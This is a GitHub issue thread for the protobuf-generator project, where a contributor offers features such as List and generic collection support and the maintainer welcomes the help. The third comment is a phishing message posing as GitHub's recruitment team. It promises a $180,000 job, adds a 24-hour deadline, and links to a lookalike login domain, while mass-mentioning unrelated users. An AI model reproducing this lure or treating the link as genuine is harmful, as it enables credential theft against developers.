### ISSUE TITLE
I've added some new features to share!

### ISSUE THREAD

**Issue by tangmin823** [chenhui0212/protobuf-generator#12]
I've added some features based your project: eg. 

1. List collection return type and parameter type
2. support genericType collection
3. support java primitive type as returnType and parameter
etc.

Could I share it with you, I wish we can optimize this tool together, Look forawrad to you reply. Thanks!

**Comment by chenhui0212** [comment]
Absolutely! I'm glad to hear that. This project hasn't been updated for long time, looking forward to our cooperation with you.

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
janole, @huajingyun, @AlkeneSun, @james016, @EltifoGM, @ntrippar, @achaiah, @majesticio, @UnknownHero, @gmittal, @hibiki333155555, @datacruiser, @prakashar11, @sknuth, @KeAWang, @asdspal, @tangxyw, @Tom-A-Lynch, @Oucema90, @jakebonk
